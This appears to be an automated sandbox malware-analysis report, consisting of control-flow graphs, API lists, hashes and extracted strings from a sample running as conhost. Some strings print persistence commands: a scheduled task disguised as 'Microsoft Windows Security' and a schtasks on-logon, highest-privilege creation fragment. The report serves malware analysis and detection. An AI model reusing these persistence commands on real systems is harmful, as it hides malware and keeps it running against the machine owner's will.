                                                                                                                                                                                                      control_flow_graph 424 7ff6e698ee40-7ff6e698ee55 425 7ff6e698ee90-7ff6e698ee9d malloc 424->425 426 7ff6e698ee57-7ff6e698ee63 malloc 424->426 427 7ff6e698eed2-7ff6e698ef11 abort CreateSemaphoreW TlsAlloc 425->427 429 7ff6e698ee9f-7ff6e698eeb8 425->429 426->427 428 7ff6e698ee65-7ff6e698ee76 426->428 433 7ff6e698ef30-7ff6e698ef36 GetLastError 427->433 434 7ff6e698ef13-7ff6e698ef22 call 7ff6e69967e0 427->434 430 7ff6e698ee78-7ff6e698ee8d memcpy 428->430 431 7ff6e698eeba-7ff6e698eed1 memset 428->431 429->430 429->431 436 7ff6e698ef27-7ff6e698ef29 433->436 434->436 437 7ff6e698ef38-7ff6e698ef5c abort 436->437 438 7ff6e698ef2b-7ff6e698ef2f 436->438 439 7ff6e698ef5e-7ff6e698ef65 437->439 440 7ff6e698ef78-7ff6e698ef7f 437->440 443 7ff6e698efe0-7ff6e698efe9 call 7ff6e698ee40 439->443 444 7ff6e698ef67-7ff6e698ef73 439->444 441 7ff6e698eff0-7ff6e698eff6 440->441 442 7ff6e698ef81-7ff6e698efa9 GetLastError TlsGetValue SetLastError 440->442 448 7ff6e698f10a-7ff6e698f111 441->448 449 7ff6e698effc-7ff6e698f006 441->449 445 7ff6e698efaf-7ff6e698efb5 442->445 446 7ff6e698f060-7ff6e698f07a calloc 442->446 443->444 452 7ff6e698f0a8-7ff6e698f0cf realloc 445->452 453 7ff6e698efbb-7ff6e698efc7 445->453 450 7ff6e698f080 446->450 451 7ff6e698f193-7ff6e698f1a3 abort 446->451 448->442 455 7ff6e698f117-7ff6e698f12d 448->455 456 7ff6e698f138-7ff6e698f140 449->456 457 7ff6e698f00c-7ff6e698f014 449->457 458 7ff6e698f083-7ff6e698f094 TlsSetValue 450->458 460 7ff6e698f1b0-7ff6e698f1b4 451->460 461 7ff6e698f1a5-7ff6e698f1a8 451->461 452->451 462 7ff6e698f0d5-7ff6e698f0ef memset 452->462 453->444 459 7ff6e698efc9-7ff6e698efd6 call 7ff6e698ee40 453->459 465 7ff6e698f0f1-7ff6e698f0f6 call 7ff6e698eee0 456->465 466 7ff6e698f142-7ff6e698f15a 456->466 463 7ff6e698f01a-7ff6e698f021 457->463 464 7ff6e698f16c-7ff6e698f180 WaitForSingleObject 457->464 458->453 468 7ff6e698f09a-7ff6e698f09d GetLastError 458->468 459->444 470 7ff6e698f1b6 460->470 471 7ff6e698f1ba-7ff6e698f1bd 460->471 461->460 462->458 463->455 473 7ff6e698f027-7ff6e698f02b 463->473 464->463 467 7ff6e698f186-7ff6e698f18e 464->467 474 7ff6e698f100-7ff6e698f104 465->474 466->474 475 7ff6e698f15c 466->475 467->463 468->453 470->471 478 7ff6e698f1bf-7ff6e698f1c2 471->478 479 7ff6e698f1c4 471->479 473->442 481 7ff6e698f031-7ff6e698f039 473->481 474->448 474->457 476 7ff6e698f160-7ff6e698f168 Sleep 475->476 476->476 483 7ff6e698f16a 476->483 478->479 484 7ff6e698f1c8-7ff6e698f1cc 478->484 481->442 482 7ff6e698f03f-7ff6e698f054 ReleaseSemaphore 481->482 482->442 483->474
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: abortmalloc$AllocCreateErrorLastSemaphorememcpymemset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 342303811-0
                                                                                                                                                                                                      • Opcode ID: b2416a83bffa5fc6a8860ff2eb45399a5a421c851ee01e0b810f98d5426b795e
                                                                                                                                                                                                      • Instruction ID: d67e15b251632b80371daa6be2c91bcd8c91087e2a86e31d3a1aaf91e7fe759c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2416a83bffa5fc6a8860ff2eb45399a5a421c851ee01e0b810f98d5426b795e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48919A33E2960385FA649F25E81077962A1AF54B88F549138DD1DC33A7DE3FE841C34A
                                                                                                                                                                                                      Function 00007FF6E69976F0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 102fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fwrite$fputs$abortfree$fputcmemcpystrlen
                                                                                                                                                                                                      • String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                                                                                                                                                                                                      • API String ID: 802779101-808685626
                                                                                                                                                                                                      • Opcode ID: ceb530bee48f6c0e02abd5d77287cb5c52b4f910e624d328fc38845c7a1d0db6
                                                                                                                                                                                                      • Instruction ID: 4b76c9243010dcc29042adba555e4d63f1491b0eef6611c888d12adb1dfc76b4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceb530bee48f6c0e02abd5d77287cb5c52b4f910e624d328fc38845c7a1d0db6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06417E22B391174EFA14A771A8197B92A519F86B8CF40413AD80DCB7D7DD2FE501C71B
                                                                                                                                                                                                      Function 00007FF6E698E8F0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 127COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionRaiseUnwindabort
                                                                                                                                                                                                      • String ID: %S /run /tn "Microsoft Windows Security"$CCG $CCG!$CCG!$CCG"
                                                                                                                                                                                                      • API String ID: 4140830120-965913644
                                                                                                                                                                                                      • Opcode ID: 72dddc97bb5a61e6f85c6fa6847e3cc55db4e4a0c1a494ea6ad14c540d0c7db8
                                                                                                                                                                                                      • Instruction ID: e173f3747a29e7dfa6157da8b6b3851dfbe16a3b7c4b84590e97b6d274cd5690
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72dddc97bb5a61e6f85c6fa6847e3cc55db4e4a0c1a494ea6ad14c540d0c7db8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2851B033A18B8282E760CB25E4447A9B370F789B98F504236EE8D93769DF7BD581C705
                                                                                                                                                                                                      Function 00007FF6E698C2E0 Relevance: 15.3, APIs: 4, Strings: 6, Instructions: 346stringCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 544 7ff6e698c2e0-7ff6e698c30b 545 7ff6e698c311-7ff6e698c32b strncmp 544->545 546 7ff6e698c708-7ff6e698c712 544->546 548 7ff6e698c331-7ff6e698c366 545->548 549 7ff6e698c686-7ff6e698c68f 545->549 546->545 547 7ff6e698c718 546->547 547->548 551 7ff6e698c42b-7ff6e698c495 strlen 548->551 549->548 550 7ff6e698c695-7ff6e698c6a3 549->550 550->548 552 7ff6e698c6a9-7ff6e698c6af 550->552 553 7ff6e698c49b-7ff6e698c4e5 call 7ff6e698e3d0 * 2 551->553 554 7ff6e698c71d 551->554 556 7ff6e698c6b1-7ff6e698c6b3 552->556 557 7ff6e698c6b9-7ff6e698c6c0 552->557 563 7ff6e698c370-7ff6e698c373 553->563 564 7ff6e698c4eb-7ff6e698c4ee 553->564 555 7ff6e698c71f-7ff6e698c732 554->555 556->548 556->557 557->548 559 7ff6e698c6c6-7ff6e698c6d3 557->559 559->548 567 7ff6e698c640-7ff6e698c650 call 7ff6e6984e50 563->567 568 7ff6e698c379-7ff6e698c385 563->568 565 7ff6e698c4f4-7ff6e698c500 564->565 566 7ff6e698c417-7ff6e698c41b 564->566 565->566 569 7ff6e698c506-7ff6e698c518 565->569 570 7ff6e698c421-7ff6e698c428 566->570 571 7ff6e698c733 566->571 581 7ff6e698c658-7ff6e698c66a 567->581 573 7ff6e698c391-7ff6e698c3a0 strlen 568->573 574 7ff6e698c387-7ff6e698c38b 568->574 577 7ff6e698c51e-7ff6e698c520 569->577 578 7ff6e698c6ec-7ff6e698c6f4 call 7ff6e6987190 569->578 570->551 579 7ff6e698c735-7ff6e698c738 571->579 575 7ff6e698c3a6-7ff6e698c3bf 573->575 576 7ff6e698c6fc-7ff6e698c700 573->576 574->573 574->581 575->576 582 7ff6e698c3c5-7ff6e698c3e1 575->582 576->546 577->578 585 7ff6e698c526-7ff6e698c541 call 7ff6e6987c00 577->585 578->576 579->555 583 7ff6e698c6d8-7ff6e698c6e7 call 7ff6e6987190 581->583 584 7ff6e698c66c-7ff6e698c66e 581->584 588 7ff6e698c3e5-7ff6e698c406 call 7ff6e6984140 strlen 582->588 583->588 584->583 589 7ff6e698c670-7ff6e698c681 call 7ff6e6987c00 584->589 598 7ff6e698c547-7ff6e698c549 585->598 599 7ff6e698c40a-7ff6e698c40d 585->599 588->599 589->588 598->599 601 7ff6e698c54f 598->601 599->566 600 7ff6e698c40f-7ff6e698c411 599->600 600->566 602 7ff6e698c73a-7ff6e698c7d0 call 7ff6e69844c0 600->602 603 7ff6e698c550-7ff6e698c568 601->603 614 7ff6e698c7d2 602->614 615 7ff6e698c7dc-7ff6e698c883 call 7ff6e698e3d0 * 2 call 7ff6e698af20 602->615 604 7ff6e698c56e-7ff6e698c571 603->604 605 7ff6e698c894-7ff6e698c89b 603->605 604->605 609 7ff6e698c577-7ff6e698c579 604->609 607 7ff6e698c57f-7ff6e698c587 605->607 608 7ff6e698c8a1-7ff6e698c8a4 605->608 613 7ff6e698c599-7ff6e698c5b1 607->613 608->607 611 7ff6e698c8aa-7ff6e698c8b0 608->611 609->607 612 7ff6e698c888-7ff6e698c88f 609->612 616 7ff6e698c5c0-7ff6e698c5c2 611->616 612->599 617 7ff6e698c590-7ff6e698c595 613->617 618 7ff6e698c5b3-7ff6e698c5b5 613->618 614->615 615->579 621 7ff6e698c5c4-7ff6e698c5ce 616->621 622 7ff6e698c5fd-7ff6e698c628 call 7ff6e6984240 call 7ff6e6984140 616->622 617->613 618->617 623 7ff6e698c5b7 618->623 621->622 625 7ff6e698c5d0-7ff6e698c5e2 621->625 622->599 636 7ff6e698c62e-7ff6e698c631 622->636 623->616 625->616 628 7ff6e698c5e4 625->628 631 7ff6e698c5e8-7ff6e698c5f7 628->631 631->631 634 7ff6e698c5f9-7ff6e698c5fb 631->634 634->621 634->622 636->603
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: strlenstrncmp
                                                                                                                                                                                                      • String ID: Z$Z$_$_$_$_GLOBAL_
                                                                                                                                                                                                      • API String ID: 1310274236-662103887
                                                                                                                                                                                                      • Opcode ID: 0fcc65ab773e09d1c95a171ce18abb01d38a9909dba44128c082fc48aaf376b1
                                                                                                                                                                                                      • Instruction ID: e20922555fa404681e1e8671f9f50ba38aa937a3c8df49c3a65528e24f18b5a8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fcc65ab773e09d1c95a171ce18abb01d38a9909dba44128c082fc48aaf376b1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9E1DE73A28683C9F7208F3198043FD3BA1AB05758F544135DA5C9BBAADF3BDA468705
                                                                                                                                                                                                      Function 00007FF6E698DB76 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 638 7ff6e698db76-7ff6e698db9b 639 7ff6e698dcf0-7ff6e698dcf4 638->639 640 7ff6e698dba1-7ff6e698dba6 638->640 639->640 643 7ff6e698dcfa 639->643 641 7ff6e698dc03-7ff6e698dc08 640->641 642 7ff6e698dba8-7ff6e698dbad 640->642 647 7ff6e698dc0e 641->647 648 7ff6e698dcc5-7ff6e698dcd5 call 7ff6e6996698 641->648 644 7ff6e698dbaf-7ff6e698dbb4 642->644 645 7ff6e698dc22-7ff6e698dc32 signal 642->645 646 7ff6e698dc50 643->646 644->646 652 7ff6e698dbba 644->652 649 7ff6e698dcd7-7ff6e698dcda 645->649 650 7ff6e698dc38-7ff6e698dc4c signal call 7ff6e698d530 645->650 653 7ff6e698dc55-7ff6e698dc5a 646->653 654 7ff6e698dc60-7ff6e698dc65 647->654 655 7ff6e698dc10-7ff6e698dc15 647->655 648->649 665 7ff6e698dd10-7ff6e698dd24 signal 648->665 660 7ff6e698dcae-7ff6e698dcb8 649->660 661 7ff6e698dcdc-7ff6e698dce8 649->661 650->646 658 7ff6e698dca0-7ff6e698dca5 652->658 659 7ff6e698dbc0-7ff6e698dbc5 652->659 654->646 662 7ff6e698dc67-7ff6e698dc6c 654->662 655->646 663 7ff6e698dc17-7ff6e698dc1c 655->663 667 7ff6e698dc6e-7ff6e698dc7e signal 658->667 668 7ff6e698dca7-7ff6e698dcac 658->668 659->646 666 7ff6e698dbcb-7ff6e698dbd0 659->666 669 7ff6e698dd00-7ff6e698dd07 660->669 670 7ff6e698dcba-7ff6e698dcc1 660->670 661->653 662->660 662->667 663->645 663->660 665->653 666->660 671 7ff6e698dbd6-7ff6e698dbe6 signal 666->671 673 7ff6e698dc84-7ff6e698dc87 667->673 674 7ff6e698dd29-7ff6e698dd3b signal 667->674 668->646 668->660 670->648 675 7ff6e698dd40-7ff6e698dd52 signal 671->675 676 7ff6e698dbec-7ff6e698dbef 671->676 673->660 677 7ff6e698dc89-7ff6e698dc95 673->677 674->653 675->653 676->660 678 7ff6e698dbf5-7ff6e698dc01 676->678 677->653 678->653
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: signal
                                                                                                                                                                                                      • String ID: CCG
                                                                                                                                                                                                      • API String ID: 1946981877-1584390748
                                                                                                                                                                                                      • Opcode ID: 622aaefb939983e8cfa3c03c2c8c57c18b3dbb29334c475367122cbf61766b0c
                                                                                                                                                                                                      • Instruction ID: d0dac5515f618c3d6e1ca99b14f2dd0a48315c80bcbaea41db27c6d95c70c223
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 622aaefb939983e8cfa3c03c2c8c57c18b3dbb29334c475367122cbf61766b0c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18412F22E3970346FF78157944517791191AF8A324F298A36D52EC73F3CD9FB888921B
                                                                                                                                                                                                      Function 00007FF6E698D540 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: QueryVirtual
                                                                                                                                                                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                                                                      • API String ID: 1804819252-1534286854
                                                                                                                                                                                                      • Opcode ID: 654ce188c381b815c7b6b833e69e620537265554bb3c12851122444eed8c47ad
                                                                                                                                                                                                      • Instruction ID: 452fa7cdd91ebe411467bb1b430696727e4f428a4e90a7d13e5d470317350867
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 654ce188c381b815c7b6b833e69e620537265554bb3c12851122444eed8c47ad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC61CC73F2974386EB108B51E8407B977A0AB45B94F448135DE4D877A6EE3FE849C309
                                                                                                                                                                                                      Function 00007FF6E6991640 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 111COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fwprintf
                                                                                                                                                                                                      • String ID: %*.*S$%-*.*S$%.*S
                                                                                                                                                                                                      • API String ID: 968622242-2115465065
                                                                                                                                                                                                      • Opcode ID: 6329df8f87e1defb220bbd85e09ae994a33894e23f7f198cf0174e87fe780c51
                                                                                                                                                                                                      • Instruction ID: 372be04a84ccccd1493ccbabcd307c351d4a9a1489ee6ef5509d579daf00689b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6329df8f87e1defb220bbd85e09ae994a33894e23f7f198cf0174e87fe780c51
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8841A273E286438AF7509E25D4087796691BB90BECF188135DA4DC76C6EE3FE441CB0A
                                                                                                                                                                                                      Function 00007FF6E69918F0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 109COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: %*.*s$%-*.*s$%.*s$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest
                                                                                                                                                                                                      • API String ID: 0-2632607494
                                                                                                                                                                                                      • Opcode ID: ce82155f069b17e6ff1fedf17130a6fce25f9ce1dd8a985e9d653b1ebc39d665
                                                                                                                                                                                                      • Instruction ID: a2a102b2299df28fe4875bace23d532c5629b48b3309b044955c8486a84bbdaf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce82155f069b17e6ff1fedf17130a6fce25f9ce1dd8a985e9d653b1ebc39d665
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2541A573A282478EF7609F6594087787691FB407ACF58C134CE4DCA2C6EE7FA8058B16
                                                                                                                                                                                                      Function 00007FF6E6982BA0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memsetwcscatwcscpywcslen
                                                                                                                                                                                                      • String ID: \??\$eth
                                                                                                                                                                                                      • API String ID: 468205783-1480138707
                                                                                                                                                                                                      • Opcode ID: f31949c7558e9127311c871981880f2ece800f83b94ef884c3d885029afe51e3
                                                                                                                                                                                                      • Instruction ID: a964ed05ebe514fb85dff16f18683680cbd2f5ec0dd63b08394349147a85475d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f31949c7558e9127311c871981880f2ece800f83b94ef884c3d885029afe51e3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F318D22E2869385FB109B35E80537572A5BF65798F048235D94CC66A3EF3FA084C30A
                                                                                                                                                                                                      Function 00007FF6E698D7B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualProtect.KERNEL32(00007FF6E69A4958,00007FF6E69A4950,00007FF6E69A3E20,00007FFBCB55ADA0,?,?,?,00000001,00007FF6E698124C), ref: 00007FF6E698D96D
                                                                                                                                                                                                        • Part of subcall function 00007FF6E698D5B0: VirtualQuery.KERNEL32 ref: 00007FF6E698D65B
                                                                                                                                                                                                      Strings
